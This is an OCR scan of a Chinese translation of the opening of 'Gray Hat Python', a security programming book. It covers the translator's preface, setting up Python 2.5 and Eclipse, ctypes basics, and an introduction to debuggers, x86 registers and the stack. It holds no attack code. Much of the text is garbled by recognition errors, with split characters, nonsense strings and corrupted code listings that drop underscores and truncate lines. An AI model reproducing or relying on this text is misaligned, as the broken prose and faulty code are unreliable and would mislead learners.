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序 


便 经 我 花 了 很 长 的 时 间 ， 寻 找 一 门 适 合 hacking 和 逆向 工程 的 语言 。 几 年 前 ， 终 于 
让 我 发现 了 Python， 而 如 今 它 已 经 成 为 了 黑客 编程 的 首选 。 不 过 对 于 Python 的 在 
hacking 应 用 方面 一 直 缺 少 一 本 详实 的 手册 。 当 我 们 用 到 问题 的 时 候 ， 不 得 不 花 很 
多 时 间 和 精力 去 阅读 论 坛 或 者 用 户 手册 ， 然 后 让 我 们 的 代码 运行 起 来 。 这 本 书 的 目 
标 就 是 提供 给 各 位 一 本 强大 的 Python Hack 手册 ， 让 大 家 在 hacking 和 逆向 工程 中 
更 加 得 心 应 手 。 


在 阅读 此 书 之 前 ， 假 设 大 家 已 经 对 各 种 黑客 工具 ， 技 术 ( 调 试 器 ， 后 门 ，fuzzer， 候 
Bas, 代码 注入 ) 都 有 一 个 理论 上 的 认识 。 我 们 的 目的 是 不 仅仅 会 使 用 各 种 基于 
Python 编写 的 工具 ， 还 要 能 够 自 定 和 编写 自己 的 工具 。 一 本 书 是 不 可 能 介绍 完 所 
有 的 的 工具 和 技术 的 ， 但 我 们 是 对 一 些 常 用 的 技术 ， 进 行 详细 的 解说 ， 而 这 些 技术 
都 是 一 通 百 通 的 ， 在 以 后 的 安全 开发 中 ， 大 家 只 要 灵活 应 用 就 行 了 。 


这 是 本 手册 类 的 书籍 ， 所 以 阅读 的 时 候 不 一 定 从 头 到 尾 。 如 果 你 是 一 个 Python 新 
F, 建议 把 全 书 都 阅览 一 通 ， 因 为 你 会 学 到 很 多 必要 的 hack 原理 和 编程 技巧 ， 便 
于 以 后 的 完成 各 种 复杂 的 任务 。 如 果 你 已 经 对 Python 很 熟悉 ， 并 且 对 ctypes 库 也 
很 了 解 了 ， 那 就 可 以 跳 过 第 二 章 。 当 然 ， 你 也 可 以 只 是 当当 看 其 中 感 兴趣 的 一 章 ， 
每 章 的 代码 都 做 了 详实 的 解释 。 


我 花 了 很 多 事件 讲解 调试 器 ， 因 为 调试 器 就 似乎 hacker 的 手术 刀 : 从 第 二 章 调试 原 
理 ， 第 五 章 Immunity 的 应 用 和 扩展 ， 到 第 六 章 和 第 七 章 的 hooking 以 及 注入 技术 
的 介绍 (用 于 内 存 的 控制 和 处理)。 


本 书 的 第 二 部 分 就 是 对 fuzzers 的 介绍 。 第 八 章 会 讲解 基础 的 fuzzer RE, FAW 
建 一 个 简单 的 file fuzzer。 第 九 章 ， 介 绍 强 大 的 Sulley fuzzing 框架 ， 并 且 使 用 它 
fuzz 一 个 真正 的 FTP 服务器。 第 十 章 ， 学 习 构 建 一 个 Windows 驱动 fuzzer。 


第 十 一 章 ， 介 绍 IDA( 最 常用 的 静态 反 汇编 工具 ) 的 Python 扩展 。 十 二 章 ， 详 细 讲 解 
PyEmu， 一 个 基于 Python 的 仿真 器 。 


本 书 的 所 有 代码 都 尽量 保持 简短 ， 在 关键 的 地 方 都 做 了 详细 的 解说 。 学 习 一 门 新 的 
语言 或 一 个 新 的 库 ， 都 需要 花费 事件 和 精力 。 所 以 建议 各 位 自己 手写 代码 。 所 有 的 
源码 可 以 在 http://www.nostarch.com/ghpython.htm 找到 。 


Now let's get coding! 

陆 陆 续 续 花 了 两 个 月 时 间 ， 终 于 初步 完成 了 gray python 的 翻译 。 对 自己 的 英文 和 
技术 的 提高 是 最 让 我 欣慰 的 。 还 有 还 有 很 多 需要 改进 的 地 方 ， 不 过 苦于 时 间 不 许 ， 
遂 无 法 进一步 完成 。 

将 此 书 献 给 我 的 家 人 ， 尤 其 是 我 的 母亲 ， 是 她 的 坚韧 和 聪慧 ， 让 我 的 人 生变 得 不 
E. R 的 伙伴 们 --- 自 由 之 光 的 所 有 队员 ( 眉 宇 间 ，codeblue， 小 龙 ，。。。)， 以 及 
佛经 教育 和 指引 过 我 的 老师 ， 还 有 那些 默默 奉献 分 享 自 己 技 术 的 hacker 们 。 


岁月 如 梭 ， 那 些 在 学 生 时 代 的 激情 岁月 ， 那 些 永 远 不 知 疲 颂 的 夜晚 ， 无 数 的 汗水 和 
青春 已 经 消逝 在 岁月 的 长 河 里 。 只 有 对 技术 和 极限 的 自由 追求 ， 不 便 变 过 。 


为 自由 和 理想 而 战 ---- 天 国之 翼 [ 自 由 之 光 ] 


个 人 简介 : 


网 名 :天 国之 又 [自由 之 光 ] , winger 年 龄 :20-30 is &:asm, c, python 就 读 过 的 
学 校 : 集美 大 学 专业 :网 络 系统 管理 工作 :自由 安全 工作 者 ，secoder(security 
coder) 网 址 :hi.baidu.com/freewinge 联系 方式 :free.winger at gmail.com 爱好 : 搏 
击 ， 修 禅 ， 音 乐 ， 电 影 最 爱 吃 的 东西 : ESF 


自由 之 光 ---- 一 个 追求 技术 自由 和 个 人 极限 的 安全 团队 。 起 源 于 集美 大 学 。 


1 搭建 开发 环境 


工具 。 相 信 我 这 样 做 是 值得 的 ， 它 会 让 你 玩 的 更 快乐 。 


这 章 我 们 会 简单 的 讲解 ，Python2.5 的 安装 ，Eclipse 配置 ， 以 及 如 何 编写 CRA 
的 Python 代码 。 


1.1 操作 系统 准 各 


就 逆向 的 趣味 性 而 言 ，Windows 是 最 好 的 目标 。 无 数 的 工具 和 广泛 的 使 用 人 群 ， 使 
得 代 码 开 发 和 Crack 都 变 得 更 容易 ， 所 以 本 书 的 大 部 分 代码 都 基于 Windows( 任 何 
你 能 搞 的 到 的 Windows 版 本 )。 


少 部 分 例子 也 能 运行 在 32 位 的 Linux 上 。 无 论 是 安装 在 VMware(VMware 提供 免 
费 版 本 ,不 同 为 版 权 担 心 ) 上 还 是 实 机 上 ， 都 行 。Linux 版 本 众多 ， 本 书 推荐 基于 
Red Hat 的 发 布 平 台 :Fedora Core 7 or Centos 5。 


免费 的 VMWARE 镜像 


VMware 在 网 站 上 提供 了 免费 的 版 本 。 这 些 虚 拟 机 用 于 逆 工 程 ， 漏 洞 分 析 ， 或 者 任 
何 程序 的 调试 ， 同 时 和 主机 完全 独立 开 来 。 主 程序 下 载 链 
f&:http://www.vmware.com/appliances/, Pyayer 程序 下 载 链 

接 :http:/www.vmware.com/products/player/。 


1.2 获取 和 安装 Python2.5 


Linuxer 可 以 跳 过 这 个 步骤 ， 大 部 分 Linux 都 内 置 了 Python, Windows 下 可 以 通过 
=t 


独立 的 安装 包 进 行 安 装 。 


1.2.1 在 Windows 上 安装 Python 


Windows 的 安装 版 本 可 以 从 Python 主页 上 下 载 http:/ 
python.org/ftp/python/2.5.1/python-2.5.1.msi。 双 击 ， 一 步 一 步 的 按 指示 安装 就 
行 。 在 默认 的 EB xx C:/Python25/ 下 ， 安 装 了 python.exe 和 默认 的 库 。 


提示 建议 大 家 安装 Immunity 调试 器 ， 其 包含 了 很 多 必须 的 附加 程序 ， 其 中 就 有 
Python 2.5 。 在 后 面 的 章节 中 ， 我 们 也 会 使 用 到 Immunity 。 下 载 页 面 
http://debugger.immunityinc.com 要 用 代理 还 要 填写 些 资 料 。 


1.2.2 在 Linux 上 安装 Python 


如 果 需 要 在 Linux 上 手工 安装 Python 的 话 ， 可 以 按 如 下 的 步骤 进行 。 这 里 使 用 
Red Hat 的 衍生 版 ， 并 且 这 个 过 程 使 用 root 权限 。 第 一 步 ， 下 载 Python 2.5 源码 
并 解压 : 


cd /usr/local/ 

wget http://python.org/ftp/python/2.5.1/Python-2.5.1.tgz 
tar -zxvf Python-2.5.1.tgz 

mv Python-2.5.1 Python25 

cd Python25 


dk db dt dt dk 


代码 解压 到 /usrlocaWPython25 之 后 ， 就 要 编译 安装 了 : 


# ./configure --prefix-/usr/local/Python25 

# make && make install 

# pwd 

/usr/local/Python25 

# python 

Python 2.5.1 (r251:54863, Mar 14 2012, 07:39:18) 

[GCC 3.4.6 20060404 (Red Hat 3.4.6-8)] on Linux2 

Type "help", "copyright", "credits" or "license" for more informat: 
>>> 


E 





现在 我 们 就 拥有 了 一 个 交互 式 的 Python Shell， 能 够 自由 的 操作 Python 和 Python 
库 了 。 输入 个 语句 测试 下 : 


>>> print "Hello World!" Hello World! 
>>> exit() 
# 


很 好 ! 一 切 工作 正常 。 为 了 让 系统 能 够 找到 Python 计时 器 的 路 径 ， 需 要 编 
辑 /root/.bashrc 文件 (/ 用 户 名 /.bashrc)。 我 个 人 比较 喜欢 nano, 不 过 你 可 以 使 用 你 喜 
欢 编 辑 器 (个 人 推荐 vim 嘿嘿)。 打 开 /root/.bashrc， 在 文件 底部 加 入 以 下 代码 。 


export PATH=/usr/local/Python25/ : $PATH 


这 样 每 次 执行 python 命令 的 时 候 ， 就 不 用 输入 完整 的 python 路 径 了 。 下 次 用 root 
登录 的 时 候 ， 就 在 任何 shell 下 输入 python 就 能 得 到 一 个 交互 式 的 Python Shell 
Te 


为 了 方便 的 开发 代码 ， 下 面 让 我 们 配置 自己 IDE(ntegrated development 
environment )。 (我 的 开发 环境 如 下 :ActivePython,UliPad 或 者 Script.NET， 
ipython 或 者 bpython。 调 试 ， 自 动 提示 ， 参 数 说 明 全 都 有 了 。 ) 


1.3 配置 Eclipse 和 PyDev 


为 了 快速 的 的 开发 调试 Python 程序 ， 就 必须 要 使 用 一 个 稳定 的 IDE 平台 。 这 里 作 
者 推 荐 的 时 候 Eclipse( 跨 平台 的 IDE) 和 PyDev。 Eclipse 以 其 强大 的 可 定制 性 而 出 


名 。 


1. 


oN o aoa 


10. 


下 面 让 我 们 看 看 和 安装 和 配置 它们 : 
从 http://www.eclipse.org/downloads/ 下 载 压 缩 包 


2. 解压 到 C:\Eclipse 
3. 
4. 第 一 次 运行 ， 会 询问 在 哪里 设置 工作 区 的 主 目录 ; 使 用 默认 的 就 行 ,将 Use this 


^, 


is fT C:\Eclipse\eclipse.exe 


as default and do not ask again 4J.E, ma OK, 


. Eclipse 安装 好 以 后 ， 选 择 Help Software Updates Find and Install 


选择 Search for new features to install 然后 点 击 Next。 


点 击 New Remote Site。 


. 在 Name 后 面 填 上 PyDev Update, 7 URI 后 面 填 上 


http://pydev.sourceforge.net/updates/, 点 击 OK 确认 ， 接 着 点 击 Finish,， 
Eclipse 会 自动 升级 PyDev。 


一 会 儿 ， 更 新 窗口 就 会 出 现 ， 找 到 顶端 的 PyDev Update， 选 上 PyDev, X 
击 Next 继 续 下 一 步 。 


阅读 PyDev 协议 ， 如 果 同 意 ， 在 accept the terms in the licens agreement 
选 上 。 


. 单 击 Next， 和 Finish. Eclipse 开始 安装 PyDe 扩展 ， 全 部 完成 后 ， 单 击 


Install All, 12 最 后 一 步 ， 在 PyDev 安装 好 之 后 ， 单 击 Yes, Eclipse 会 重新 
启动 并 加 载 PyDev。 


使 用 如 下 步骤 配置 Eclipse， 以 确保 PyDev 能 正确 的 调用 Python 解释 器 执行 脚 


o 


. Eclipese 驱动 后 ， 选 择 Window Preferences 
2. 扩展 PyDev， 选 择 Interpreter — Python。 

3. 在 对 话 框 项 端的 Python Interpreters 中 点 击 New. 
4. 

5. 下 一 个 对 话 框 将 会 列 出 Python 中 已 经 安装 了 的 库 。 
6. 


浏览 到 C:\Python25\python.exe， 然 后 点 击 Open. 


再 次 点 击 OK 完成 安装 。 


在 开始 编码 前 ， 需 要 创建 一 个 PyDev 工程 。 本 书 的 所 有 代码 都 可 以 在 这 个 工程 中 
打开 


1. 依次 选择 File-->New-->Project。 
2. 展开 PyDev 选择 PyDev Project， 点 击 Next 继续 。 
3. 将 工程 命名 为 Gray Hat Python. 点 击 Finish。 


Eclipse 窗口 自动 更 新 之 后 ， 会 看 到 Gray Hat Python 工程 出 现在 屏幕 左上 和 角 。 现 
在 右 击 sec 文件 夹 ， 选 择 New-->PyDev Module, ft Name 字段 输入 chapter1- 
test， 点 击 Finish M2 看 到 ， 工 程 面 板 被 更 新 了 ，chapter1-test.py 被 加 到 列表 
中 。 


在 Eclipse 中 运行 Python 脚本 ， 重 要 单 击 工具 栏 上 的 Run As( 由 绿 圈 包围 的 白色 箭 
头 ) 按 钮 就 行 了 。 要 运行 以 前 的 脚本 ， 可 以 使 用 快捷 键 CTRL-F11。 脚 本 的 输出 会 
显示 在 Eclipse 底 端的 Console 面板 。 现 在 万 事 俱 备 只 欠 代 码 。 


1.3.1 hacker 们 的 朋友 :ctypes 


ctypes 是 强大 的 ， 强 大 到 本 书 以 后 介绍 的 几乎 所 有 库 都 要 基于 此 。 使 用 它 我 们 就 能 
够 调 用 动态 链接 库 中 图 数 ， 同 时 创建 各 种 复杂 的 C 数据 类 型 和 底层 操作 画 数 。 毫 
无 疑问 ，ctypes 就 是 本 书 的 基础 。 


1.3.2 使 用 动态 链接 库 


使 用 ctypes 的 第 一 步 就 是 明白 如 何 解 析 和 访问 动态 链接 库 中 的 函数 。 一 个 
dynamically linked library( 被 动态 连接 的 库 ) 其 实 就 是 一 个 二 进 制 文件 ， 不 过 一 般 自 
己 不 运行 ， 而 是 由 别 的 程序 调用 执行 。 在 Windows 上 叫做 dynamic link libraries 
(DLL) 动 态 链接 库 , 在 Linux EU} 做 shared objects (SO) 共 享 库 。 无 论 什么 平台 ， 这 
些 库 中 的 函数 都 必须 通过 导出 的 名 字 调 用 ， 之 后 再 在 内 存 中 找 出 真正 的 地 址 。 所 以 
LH Abs APARA, ab aR Wet, 不 过 ctypes 蔡 我 们 完成 了 
这 一 步 。 


ctypes 提供 了 三 种 方法 调用 动态 链接 库 :cdll(), windll(), 和 oledll()。 它 们 的 不 同 之 处 
就 在 于 ， 画 数 的 调用 方法 和 返回 值 。cdll() 加 载 的 库 ， 其 导出 的 函数 必须 使 用 标准 
的 cdecl 调用 约定 。windll() 方 法 加 载 的 库 ， 其 导出 的 函数 必须 使 用 stdcall 73 FH 25 
定 (Win32 API 的 原生 约 定 )。oledll() 方 法 和 windll() #1, Ait 8n R AROR [B] — 7 
HRESULT 错误 代码 ， 可 以 使 用 COM 函数 得 到 具体 的 错误 信息 。 


调用 约定 


调用 约定 专 指 画 数 的 调用 方法 。 其 中 包括 ， 画 数 人 参数 的 传递 方法 ， 顺 序 ( 压 入 栈 或 
者 传 给 寄存 器 ) ， 以 及 豆 数 返 回 时 ， 栈 的 平衡 处 理 。 下 面 这 两 种 约定 是 我 们 最 常用 
到 的 : cdecl and stdcall。cdecl 调用 约定 ， 男 数 的 参数 从 右 往 左 依次 太 入 栈 内 ， 男 
数 的 调用 者 ， 在 函数 执行 完成 后 ， 负 责 画 数 的 平衡 。 这 种 约定 常用 于 x86 架构 的 

C 语言 里 。 


In C 


int python rocks(reason one, reason two, reason three); 


In x86 Assembly 


push reason three 
push reason two 
push reason one 
call python rocks 
add esp, 12 


从 上 面 的 汇编 代码 中 ， 可 以 清晰 的 看 出 参数 的 传递 顺序 ， 最 后 一 行 ， 栈 指针 增加 了 
12 个 字 节 (三 个 参数 传递 个 汞 数 ， 每 个 被 于 入 栈 的 指针 都 占 4 个 字 节 ， 共 12 个 )， 
使 得 范 数 调用 之 后 的 栈 指针 恢复 到 调用 前 的 位 置 。 


下 面 是 个 stdcall 调用 约定 的 了 例子 ， 用 于 Win32 API. 
In C 


int my socks(color one color two, color three); 


In x86 Assembly 


push color three 
push color two 
push color one 
call my socks 


这 个 例子 里 ， 参 数 传递 的 顺序 也 是 从 右 到 左 ， 不 过 栈 的 平衡 处 理由 辑 数 my_socks 
自己 完成 ， 而 不 是 调用 者 。 最 后 一 点 ， 这 两 种 调用 方式 的 返回 值 都 存储 在 EAX 
中 。 


下 面 做 一 个 简单 的 试验 ， 直 接 从 C 库 中 调用 printf() 函 数 打 印 一 条 消息 ，Windows 
中 的 C 库 位 于 C:\WINDOWS\system32\msvcrt.dll，Linux FAY C 库 位 
于 /lib/libc.so.6。 


chapter1-printf.py Code on Windows 


from ctypes import * 


msvcrt = cdll.msvcrt 
message string = "Hello world!^n" 
msvcrt.printf("Testing: %s", message string) 


C:\Python25> python chapteri-printf.py 
Testing: Hello world! 
C:\Python25> 
Linux 下 会 有 略微 不 同 : 
chapter1-printf.py Code on Linux 
from ctypes import * 
libc = CDLL("libc.so.6") 


message string = "Hello world!*^n" 
libc.printf("Testing: %s", message string) 


输出 结果 如 下 : 


# python /root/chapteri-printf.py 
Testing: Hello world! 
# 


可 以 看 到 ctypes 调用 动态 链接 库 中 的 函数 有 多 简单 。 


1.3.3 构造 C 数据 类 型 


使 用 Python 创建 一 个 C 数据 类 型 很 简单 ， 你 可 以 很 容易 的 使 用 由 C 或 者 C++ 些 的 
组 件 。 Listing 1-1 显示 三 者 之 间 的 对 于 关系 。 


C Type Python Type ctypes Type 
char 1-character string c char 
wchar t 1-character Unicode string Cc wchar 
char int/long c byte 
char int/long c ubyte 
short int/long c short 
unsigned short int/long c ushort 
int int/long C int 
unsigned int int/long c uint 
long int/long c long 
unsigned long int/long c ulong 
long long int/long c longlong 
unsigned long long int/long c ulonglong 
float float C float 
double float c double 
char * (NULL terminated) string or none c char p 
wchar t * (NULL terminated) unicode or none C wchar p 
void * int/long or none C void p 


Listing 1-1:Python 与 C 数据 类 型 映射 


请 把 这 章 表 放 到 随时 很 拿 到 的 地 方 。ctypes 类 型 初始 化 的 值 ， 大 小 和 类 型 必须 符合 
定义 的 要 求 。 看 下 面 的 例子 。 


C:\Python25> python.exe 

Python 2.5 (r25:51908, Sep 19 2006, 09:52:17) [MSC v.1310 32 bit (: 
>>> from ctypes import * 

>>> c int() c long(0) 

>>> c char p("Hello world!") c char p('Hello world!') 
>>> c ushort(-5) c ushort(65531) 

>>> c short(-5) c short(-5) 

>>> seitz = c char p("loves the python") 

>>> print seitz c char p('loves the python') 

>>> print seitz.value loves the python 

>>> exit() 


‘ 一 一 








最 后 一 个 例子 将 包含 了 "loves the python" PS F 4 È HH s& 48 26 d 8E 
seitz, 并 通过 seitz.value 方法 间接 引用 了 指针 的 内 容 ， 


1.3.5 定义 结构 和 联合 

结构 和 联合 是 非常 重要 的 数据 类 型 ， 被 大 量 的 适用 于 WIN32 B API 和 Linux 的 
libc 中 。 一 个 结构 变量 就 是 一 组 简单 变量 的 集合 (所 有 变量 都 占用 空间 ) 些 结构 内 的 
变量 在 类 型 上 没 有 限制 ， 可 以 通过 点 加 变量 名 来 访问 。 比 如 
beer_recipe.amt_barley， 就 是 访问 beer recipe 结 构 中 的 amt barley 变量 。 


In C 


Struct beer_recipe 


{ 
int amt barley; 
int amt water; 
3 
In Python 


class beer recipe(Structure): 
fields = [ 

("amt barley", c int), 

("amt water", c int), 


如 你 所 见 ，ctypes 很 简单 的 就 创建 了 一 个 C 兼容 的 结构 。 联合 和 结构 很 像 。 但 是 
联合 中 所 有 变量 同人 处 一 个 内 存 地 址 ， 只 占用 一 个 变量 的 内 存 空间 ， 这 个 空间 的 大 小 
就 是 最 大 的 那个 变量 的 大 小 。 这 样 就 能 够 将 联合 作为 不 同类 型 的 变量 操作 访 NT. 


In C 


union { 
long barley long; int barley int; 
char barley char[8]; 

jbarley amount; 


In Python 


class barley amount(Union): 
_fields. = [ 
("barley_long", c_long), 
("barley_int", c_int), 
("barley_char", c_char * 8), 


如 果 我 们 将 一 个 整数 赋值 给 联合 中 的 barley_int， 接 着 我 们 就 能 够 调用 
barley_char， 用 字符 的 形式 显示 刚才 输入 的 66。 


chapter1-unions.py 


from ctypes import * 
class barley amount(Union): 
fields = [ 
("barley long", c long), ("barley int", c int), ("barley cl 
] 


value - raw input("Enter the amount of barley to put into the beer 
my barley = barley amount(int(value)) 

print "Barley amount as a long: %ld" % my barley.barley long 

print "Barley amount as an int: %d" % my barley.barley long 

print "Barley amount as a char: %s" % my barley.barley char 


天 FE 





输出 如 下 : 


C:\Python25> python chapteri-unions.py 

Enter the amount of barley to put into the beer vat: 66 
Barley amount as a long: 66 

Barley amount as an int: 66 

Barley amount as a char: B C:\Python25> 


给 联合 赋 一 个 值 就 能 得 到 三 种 不 同 的 表现 方式 。 最 后 一 个 barley_char 输出 的 结果 
是 B， 因为 66 刚好 是 B 的 ASCII 码 。 


barley_char 成 员 同 时 也 是 个 数组 ， 一 个 八 个 字符 大 小 的 数组 。 在 ctypes 中 申请 一 
个 数组 ， 只 要 简单 的 将 变量 类 型 乘 以 想 要 申请 的 数量 就 可 以 了 。 


一 切 就 绪 ， 开 始 我 们 的 旅程 吧 ! 





2 ines ik it 


调试 器 就 是 黑客 的 眼睛 。 你 能 够 使 用 它 对 程序 进行 动态 跟 踪 和 分 析 。 特 别 是 当 涉 及 
到 exploit ,fuzzer 和 病毒 分 析 的 时 候 ， 动态 分 析 的 能 力 决定 你 的 技术 水 平 。 对 于 调 
试 器 的 使 用 大 家 都 再 熟悉 不 过 了 ， 但 是 对 调试 器 的 实现 原理 ， 估 计 就 不 是 那么 熟悉 
了 。 当 我 们 对 软件 缺陷 进行 评估 的 时 候 ， 


调试 器 提供 了 非常 多 的 便利 和 优点 。 比 如 运行 ， 暂 停 ， 步 进 ， 一 个 进程 ; 设置 断 
操作 寄存 器 和 内 存 ; 捕捉 内 部 异常 ， 这 些 底层 操作 的 细节 ， 正 是 我 这 章 要 详细 
采 讨 的 。 


在 深入 学 习 之 前 ， 先 让 我 们 先 了 解 下 白 盒 调试 和 黑 盒 调试 的 不 同 。 许 多 的 开发 平台 
都 会 包含 一 个 自 带 的 调试 器 ， 人 允许 开发 工具 结合 源 代 码 对 程序 进行 精确 的 跟踪 测 
试 。 这 就 是 白 盒 调试 。 当 我 们 很 难得 到 源 代 码 的 时 候 ， 开 发 者 ， 逆 向 工程 病 ， 
Hacker 就 会 应 用 黑 盒 调 试 跟 踪 目 标 程序 。 黑 盒 调 试 中， 被 测试 的 软件 对 黑客 来 说 
是 不 透明 的 ， 唯 一 能 看 到 的 就 是 反 汇编 代码 。 这 时 候 要 分 析出 程序 的 运作 流程 ， 找 
出 程序 的 错误 将 变 得 更 复杂 ， 花 费 的 时 间 也 会 更 多 。 但 是 高 超 的 逆向 技术 集合 优秀 
的 逆向 工具 将 使 这 个 过 程 变 得 简单 ， 轻 松 ， 有 时 候 善于 此 道 的 黑客 ， 甚 至 比 开 发 者 
更 了 解 软件 :)。 


黑 盒 测 试 分 成 两 种 不 同 的 模式 : 用 户 模 式 和 内 核 模 式 。 用 户 模 式 (通常 指 的 是 
ring3 级 的 程序 ) 是 你 平时 运行 用 户 程 序 的 一 般 模 式 (普通 的 程序 ) 。 用 户 模式 的 
权限 是 最 低 的 。 当 你 运行 “运算 器 (cacl.exe) ”的 时 候 ， 就 会 产生 一 个 用 户 级 别 的 
进程 ; 对 这 个 进程 的 调试 就 是 用 户 模式 调试 。 核 心 模 式 的 权限 是 最 高 的 。 这 里 运行 
着 操作 系统 内 核 ， 驱 动 程序 ， 底 层 组 件 。 当 运行 Wireshark 嗅 探 数 据 包 的 时 候 ， 就 
是 和 一 个 工作 在 内 核 的 网 络 驱动 交互 。 如 果 你 想 暂 停 驱 动 或 者 检测 驱动 状态 ， 就 需 
要 使 用 支持 内 核 模式 的 调试 器 了 。 


下 面 的 这 些 用 户 模式 的 调试 器 大 家 应 该 再 熟悉 不 过 了 : WinDbg (微软 生产 ) ， 
OllyDbg (一 个 免费 的 调试 器 作者 是 Oleh Yuschuk) 。 当 你 在 Linux 下 调试 程序 的 
时 候 ， 就 需要 使 用 标准 的 GNU 调试 器 (gdb) 。 以 上 的 三 个 调试 器 相当 的 强大 ， 
都 有 各 自 的 特色 和 优点 。 


最 近 几 年 ， 调 试 器 的 智能 调试 技术 也 取得 了 长 足 的 发 展 ， 特 别 是 在 Windows 平 

台 。 智能 调试 体现 在 强大 可 扩展 性 上 ， 常 常 通过 脚本 或 者 别 的 方式 对 调试 器 进行 进 
一 步 的 开发 利 用 ， 比 如 安装 钩子 范 数 ， 以 及 其 他 的 专门 为 Hacker 和 逆向 工程 病 专 
门 定制 的 各 种 功能 。 在 这 方面 出 现 了 两 个 新 的 具有 代表 性 的 作品 分 别 
是 PyDbg (byPedram Amini) 和 Immunity Debugger (from Immunity, Inc.)。 


PyDbg 是 一 个 纯 Python 实现 的 调试 器 ， 让 黑客 能 够 用 Python 语言 全 面 的 控制 一 
个 进程 ， 实现 自动 化 调试 。Immunity 调试 器 则 是 一 个 会 让 你 眼前 一 亮 的 调试 器 ， 
界面 相当 的 友好 ， 类 似 OllyDbg， 但 是 拥有 更 强大 的 功能 以 及 更 多 的 Python 调试 
库 。 这 两 个 调试 器 在 本 书 的 后 面 章节 将 会 详细 的 介绍 。 现 在 先 让 我 们 深入 了 解 调 试 
器 的 一 般 原 理 。 

在 这 章 ， 我 们 将 把 注意 力 集中 在 x86 平台 下 的 用 户 模式 ， 通 过 对 CPU 体系 结构 ， 
(HE) 栈 以 及 调试 器 的 底层 操作 细节 的 深入 探究 ， 理 解 调试 器 的 工作 原理 ， 为 实现 我 
们 自己 的 调试 器 打下 基础 。 
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2.1 通用 CPU 寄存 器 


CPU 的 寄存 器 能 够 对 少量 的 数据 进行 快速 的 存 取 访 问 。 在 x86 指令 集 里 ， 一 个 
CPU 有 八 个 通用 寄存 器 : EAX, EDX, ECX, ESI, EDI, EBP ESP 和 EBX。 还 有 很 
多 别 的 寄存 器 ， 遇 到 的 时 候 具 体 讲 解 。 这 八 个 通用 寄存 器 各 有 不 同 的 用 途 ， 了 解 它 
们 的 作用 对 于 我 们 设计 调试 器 是 至 关 重 要 的 。 让 我 们 先 简略 的 看 一 看 每 个 寄存 器 和 
功能 。 最 后 我 们 将 通过 一 个 简单 的 实 验 来 说 明 他 它们 的 使 用 方法 。 


EAX 寄存 器 也 叫做 累加 寄存 器 ， 除 了 用 于 存储 函数 的 返回 值 外 也 用 于 执行 计算 的 
操作 。 许 多 优化 的 x86 指 今 集 都 专门 设计 了 针对 EAX 寄存 器 的 读 写 和 计算 指 今 。 
列 如 从 最 基本 的 加 减 ,比较 到 特殊 的 乘除 操作 都 有 专门 的 EAX 优化 指令 。 


前 面 我 们 说 了 ， 画 数 的 返回 值 也 是 存储 在 EAX 寄存 器 里 。 这 一 点 很 重要 ， 因 为 通 
过 返 回 的 EAX 里 的 值 我 们 可 以 判断 函数 是 执行 成 功 与 否 ， 或 者 得 到 确切 返回 值 。 


EDX 寄存 器 也 叫做 数据 寄存 器 。 这 个 寄存 器 从 本 质 上 来 说 是 EAX 寄存 器 的 延伸 ， 
它 辅助 EAX 完成 更 多 复杂 的 计算 操作 像 乘法 和 除法 。 它 虽然 也 能 当 作 通用 寄存 器 
使 用 ， 不 过 更 多 的 是 结合 EAX 寄存 器 进行 计算 操作 。 


ECX 寄存 器 ， 也 叫做 计数 寄存 器 ， 用 于 循环 操作 ， 比 如 重复 的 字符 存储 操作 ， 或 
者 数字 统计 。 有 一 点 很 重要 ，ECX 寄存 器 的 计算 是 向 下 而 不 是 向 上 的 (简单 理解 就 
是 用 于 循环 操作 时 是 由 大 减 到 小 的 ) 。 


看 一 下 下 面 的 Python 片段 : 


counter = 0 

while counter < 10: 
print "Loop number: %d" % counter 
counter += 1 


如 果 你 把 这 代码 转化 成 汇编 代码 ， 你 会 看 到 第 一 轮 的 时 候 ECX 将 等 于 10， 第 二 轮 
的 时 候 等 于 9， 如 此 反复 知道 ECX 减少 到 0。 这 很 容易 让 人 困惑 ， 因 为 这 和 
Python 的 循环 刚好 代码 相反 ， 但 是 只 要 记得 ECX 是 向 下 计算 的 就 行 了 。 


在 x86 汇编 里 ， 依 靠 ESI 和 EDI 寄存 器 能 对 需要 循环 操作 的 数据 进行 高 效 的 处 
HR, ESI 寄存 器 是 源 操 作 数 指针 ， 存 储 着 输入 的 数据 流 的 位 置 。EDI 寄存 器 是 目的 
操作 数 指针 ， 存储 了 计算 结果 存储 的 位 置 。 简 而 言 之 ，ESI (source inde) 用 于 
ik, EDI (destination index) 用 于 写 。 用 源 操作 数 指针 和 目的 操作 数 指针 ， 极 大 
的 提高 了 程序 处 理 数据 的 效率 。 


ESP 和 EBP 分 别 是 栈 指针 和 基 指 针 。 这 两 个 寄存 器 共同 负责 范 数 的 调用 和 栈 的 操 

作 。 当 一 个 画 数 被 调用 的 时 候 ， 画 数 需要 的 参数 被 陆续 压 进 栈 内 最 后 男 数 的 返回 地 

址 也 被 压 进 。ESP 指 着 栈 项 ， 也 就 是 返回 地 址 。 EBP 则 指 着 栈 的 底 端 。 有 时 候 ， 

eee 化 ， 释 放 EBP， 使 其 不 再 用 于 栈 的 操作 ， 只 作为 普通 的 寄存 器 
用 。 


EBX 是 唯一 一 个 没有 特殊 用 途 的 寄存 器 。 它 能 够 作为 额外 的 数据 储存 器 。 还 有 一 
个 需要 提 及 的 寄存 器 就 是 EIP。 这 个 寄存 器 总 是 指向 马上 要 执行 的 指 合 。 当 CPU 
执行 一 个 程序 的 成 千 上 万 的 代码 的 时 候 ，EIP 会 实时 的 指向 当前 CPU 马上 要 执行 
到 的 位 置 。 


一 个 调试 器 必须 能 够 很 方便 的 获取 和 修改 这 些 寄存 器 的 内 容 。 每 一 个 操作 系统 都 提 
供 了 一 个 接口 让 调试 器 和 CPU 交互 ， 以 便 能 够 获取 和 修改 这 些 值 。 我 们 将 在 后 面 
的 操作 系统 章节 详细 的 单独 的 讲解 。 


2.2 X 


A RAR, RE- -THAER REBT SHARKS 
信息 ， 包括 函数 的 参数 和 男 数 执行 完成 后 返回 的 方法 。 ESP 负责 跟踪 栈 顶 ，EBP 
负责 跟踪 栈 底 。 栈 从 内 存 的 高 地 址 像 低 地 址 增长 。 让 我 们 用 前 面 编写 的 函数 
my_sock() 作 为 例子 讲解 栈 是 如 何 工 作 的 。 


Function Call in C 


int my socks(color one, color two, color three); 


Function Call in x86 Assembly 


push color three 
push color two 
push color one 
call my socks 


栈 框 架 的 结构 将 如 图 2-1, 


| 
Stack growth direction 


图 2-1: my. socks() E8253 A HIR 25 44 


BIMBI, ETE SARAH, febeptiEBDA RE PHARM nh, 
